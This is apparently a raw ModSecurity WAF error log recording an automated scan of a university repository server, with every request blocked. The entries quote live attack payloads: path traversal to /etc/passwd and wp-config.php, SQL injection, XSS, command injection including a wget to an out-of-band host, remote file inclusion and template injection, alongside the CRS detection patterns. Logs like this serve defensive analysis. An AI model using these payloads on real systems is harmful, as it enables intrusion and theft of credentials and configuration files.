"ZO12-sCo-f0AAAc8A0UAAAAK"]
[Tue Aug 29 11:41:35.534523 2023] [:error] [pid 1042] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:param1. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: )--  found within ARGS:param1: dummy' AND (SELECT 1 FROM (SELECT(SLEEP(5)))dummy)-- dummy"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/AurallRECMonitor/services/svc-login.php"] [unique_id "ZO12-8Co-f0AAAQSWq8AAAA0"]
[Tue Aug 29 11:41:36.438277 2023] [:error] [pid 1852] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:za_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:za_file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/zip-attachments/download.php"] [unique_id "ZO13AMCo-f0AAAc8A1oAAAAK"]
[Tue Aug 29 11:41:36.573221 2023] [:error] [pid 1479] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:UID. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c found within ARGS:UID: ..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5c..\\x5cwindows\\x5cwin.ini"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/exportFile"] [unique_id "ZO13AMCo-f0AAAXHqDcAAAAT"]
[Tue Aug 29 11:41:39.436246 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:order. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: \\x22></ found within ARGS:order: \\x22></script><script>alert(document.domain)</script>"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/finder/index.php"] [unique_id "ZO13A8Co-f0AAAc0NkYAAAAM"]
[Tue Aug 29 11:41:39.497023 2023] [:error] [pid 1844] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:\\\\b(?:(?:s(?:ys\\\\.(?:user_(?:(?:t(?:ab(?:_column|le)|rigger)|object|view)s|c(?:onstraints|atalog))|all_tables|tab)|elect\\\\b.{0,40}\\\\b(?:substring|users?|ascii))|m(?:sys(?:(?:queri|ac)e|relationship|column|object)s|ysql\\\\.(db|user))|c(?:onstraint ..." at ARGS:sql. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "116"] [id "950007"] [rev "2"] [msg "Blind SQL Injection Attack"] [data "Matched Data: systables found within ARGS:sql: select st.tablename from sys.systables st"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/nacos/v1/cs/ops/derby"] [unique_id "ZO13A8Co-f0AAAc0NkcAAAAM"]
[Tue Aug 29 11:41:40.487282 2023] [:error] [pid 1852] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:fn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:fn: ../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13BMCo-f0AAAc8A3UAAAAK"]
[Tue Aug 29 11:41:42.875710 2023] [:error] [pid 1290] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:adminDirHand. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:adminDirHand: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/include/dialog/config.php"] [unique_id "ZO13BsCo-f0AAAUKhMsAAABC"]
[Tue Aug 29 11:41:45.519859 2023] [:error] [pid 1860] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:[\\\\;\\\\|\\\\`]\\\\W*?\\\\bcc|\\\\b(wget|curl))\\\\b|\\\\/cc(?:[\\\\'\\"\\\\|\\\\;\\\\`\\\\-\\\\s]|$))" at ARGS:value. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "25"] [id "950907"] [rev "2"] [msg "System Command Injection"] [data "Matched Data: wget found within ARGS:value: $(wget http:/cjmnbitjmimt14dgn26gqqxadhm7t9urh.oast.site))"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO13CcCo-f0AAAdECTYAAAAW"]
[Tue Aug 29 11:41:46.413182 2023] [:error] [pid 1857] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:alg_wc_pif_download_file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:alg_wc_pif_download_file: ../../../../../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-post.php"] [unique_id "ZO13CsCo-f0AAAdBfDoAAAAR"]
[Tue Aug 29 11:41:49.377126 2023] [:error] [pid 1853] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:language. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../ found within ARGS:language: ../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/kvmlm2/index.dhtml"] [unique_id "ZO13DcCo-f0AAAc92ssAAAAD"]
[Tue Aug 29 11:41:56.397525 2023] [:error] [pid 1865] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13FMCo-f0AAAdJqQMAAAAC"]
[Tue Aug 29 11:41:57.356261 2023] [:error] [pid 1847] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:score. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:score: 2134\\x22><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/"] [unique_id "ZO13FcCo-f0AAAc36xsAAAAO"]
[Tue Aug 29 11:41:59.826908 2023] [:error] [pid 1855] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4|ipv ..." at ARGS:rsvp_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: sleep( found within ARGS:rsvp_id: (select(0)from(select(sleep(5)))a)"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.6"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-json/rsvpmaker/v1/stripesuccess/anythinghere"] [unique_id "ZO13F8Co-f0AAAc-5x4AAAAN"]
[Tue Aug 29 11:42:00.435594 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Match of "beginsWith %{request_headers.host}" against "TX:1" required. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "163"] [id "950120"] [rev "3"] [msg "Possible Remote File Inclusion (RFI) Attack: Off-Domain Reference/Link"] [data "Matched Data: http://cjmnbitjmimt14dgn26g9kepyrk8aehtm.oast.site/hqbq.txt found within TX:1: cjmnbitjmimt14dgn26g9kepyrk8aehtm.oast.site/hqbq.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/RFI"] [hostname "repository.unla.ac.id"] [uri "/plugins/ueditor/php/controller.php"] [unique_id "ZO13GMCo-f0AAAdV7YMAAAAa"]
[Tue Aug 29 11:42:01.426837 2023] [:error] [pid 1877] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../ found within ARGS:controller: ../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13GcCo-f0AAAdV7YYAAAAa"]
[Tue Aug 29 11:42:04.428011 2023] [:error] [pid 1866] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS_NAMES:cat /etc/passwd. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS_NAMES:cat /etc/passwd: cat/etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/command.cgi"] [unique_id "ZO13HMCo-f0AAAdKXMYAAAAK"]
[Tue Aug 29 11:42:05.422416 2023] [:error] [pid 1885] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:download. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:download: /etc/passwd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13HcCo-f0AAAddJpkAAAAh"]
[Tue Aug 29 11:42:06.481036 2023] [:error] [pid 1855] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\b([\\\\d\\\\w]++)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)(?:(?:=|<=>|r?like|sounds\\\\s+like|regexp)([\\\\s'\\"`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98\\\\(\\\\)]*?)\\\\2\\\\b|(?:!=|<=|>=|<>|<|>|\\\\^|is\\\\s+not ..." at ARGS:msg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "77"] [id "950901"] [rev "2"] [msg "SQL Injection Attack: SQL Tautology Detected."] [data "Matched Data: script>alert found within ARGS:msg: </script><script>alert(document.domain)</script>"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/wp-content/plugins/socialfit/popup.php"] [unique_id "ZO13HsCo-f0AAAc-5zAAAAAN"]
[Tue Aug 29 11:42:07.511758 2023] [:error] [pid 1835] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:file: ../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13H8Co-f0AAAcrilUAAAAB"]
[Tue Aug 29 11:42:08.354783 2023] [:error] [pid 1838] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:apikey. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: ' found within ARGS:apikey: 'UNION select 1,'YToyOntzOjM6InVpZCI7czo0OiItMTAwIjtzOjIyOiJBQ1RJVkVfRElSRUNUT1JZX0lOREVYIjtzOjE6IjEiO30=';"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/fw.login.php"] [unique_id "ZO13IMCo-f0AAAcuUnkAAAAI"]
[Tue Aug 29 11:42:08.378808 2023] [:error] [pid 1884] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: /../ found within ARGS:file: /../wp-config.php"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/wp-admin/admin-ajax.php"] [unique_id "ZO13IMCo-f0AAAdcs8MAAAAC"]
[Tue Aug 29 11:42:09.356683 2023] [:error] [pid 1838] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(\\\\!\\\\=|\\\\&\\\\&|\\\\|\\\\||>>|<<|>=|<=|<>|<=>|xor|rlike|regexp|isnull)|(?:not\\\\s+between\\\\s+0\\\\s+and)|(?:is\\\\s+null)|(like\\\\s+null)|(?:(?:^|\\\\W)in[+\\\\s]*\\\\([\\\\s\\\\d\\"]+[^()]*\\\\))|(?:xor|<>|rlike(?:\\\\s+binary)?)|(?:regexp\\\\s+binary))" at ARGS:service-cmds-peform. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "70"] [id "981319"] [rev "2"] [msg "SQL Injection Attack: SQL Operator Detected"] [data "Matched Data: || found within ARGS:service-cmds-peform: ||whoami||"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "repository.unla.ac.id"] [uri "/cyrus.index.php"] [unique_id "ZO13IcCo-f0AAAcuUnsAAAAI"]
[Tue Aug 29 11:42:09.408703 2023] [:error] [pid 1869] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../ found within ARGS:file: ../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13IcCo-f0AAAdNKFQAAAAR"]
[Tue Aug 29 11:42:11.369000 2023] [:error] [pid 1874] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:sn. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../ found within ARGS:sn: ../../WEB-INF/"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/brightmail/servlet/com.ve.kavachart.servlet.ChartStream"] [unique_id "ZO13I8Co-f0AAAdSZKUAAAAX"]
[Tue Aug 29 11:42:11.435227 2023] [:error] [pid 1866] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13I8Co-f0AAAdKXNMAAAAK"]
[Tue Aug 29 11:42:12.420624 2023] [:error] [pid 1886] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:file: ../../../../../../../../../../../../../etc/passwd\\x00.jpg"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/downloader.php"] [unique_id "ZO13JMCo-f0AAAdeQzoAAAAQ"]
[Tue Aug 29 11:42:14.357372 2023] [:error] [pid 1884] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:controller. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../ found within ARGS:controller: ../../../../../../../../../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13JsCo-f0AAAdcs9MAAAAC"]
[Tue Aug 29 11:42:14.361073 2023] [:error] [pid 1838] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:pg. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../../../../../../../../../../../ found within ARGS:pg: ../../../../../../../../../../../../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/tarantella/cgi-bin/secure/ttawlogin.cgi/"] [unique_id "ZO13JsCo-f0AAAcuUoIAAAAI"]
[Tue Aug 29 11:42:14.431337 2023] [:error] [pid 1884] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:file. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../ found within ARGS:file: ../../../../etc/passwd"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/filemanager/ajax_calls.php"] [unique_id "ZO13JsCo-f0AAAdcs9QAAAAC"]
[Tue Aug 29 11:42:15.397054 2023] [:error] [pid 1883] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:cat_id. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:cat_id: ${system(ls)}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/infusions/downloads/downloads.php"] [unique_id "ZO13J8Co-f0AAAdb7igAAAAb"]
[Tue Aug 29 11:42:17.387895 2023] [:error] [pid 1839] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\W{4,}" at ARGS:page_slug. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "37"] [id "960024"] [rev "2"] [msg "Meta-Character Anomaly Detection Alert - Repetative Non-Word Characters"] [data "Matched Data: ../../../../../ found within ARGS:page_slug: ../../../../../etc/passwd\\x00"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [hostname "repository.unla.ac.id"] [uri "/index.php"] [unique_id "ZO13KcCo-f0AAAcvBjsAAAAJ"]
[Tue Aug 29 11:42:19.376849 2023] [:error] [pid 1872] [client 143.42.78.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "([\\\\~\\\\!\\\\@\\\\#\\\\$\\\\%\\\\^\\\\&\\\\*\\\\(\\\\)\\\\-\\\\+\\\\=\\\\{\\\\}\\\\[\\\\]\\\\|\\\\:\\\\;\\"\\\\'\\\\\\xc2\\xb4\\\\\\xe2\\x80\\x99\\\\\\xe2\\x80\\x98\\\\`\\\\<\\\\>].*?){4,}" at ARGS:search_key. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "159"] [id "981173"] [rev "2"] [msg "Restricted SQL Character Anomaly Detection Alert - Total # of special characters exceeded"] [data "Matched Data: } found within ARGS:search_key: {{1337*1338}}"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [hostname "repository.unla.ac.id"] [uri "/search"] [unique_id "ZO13K8Co-f0AAAdQ3fsAAAAV"]
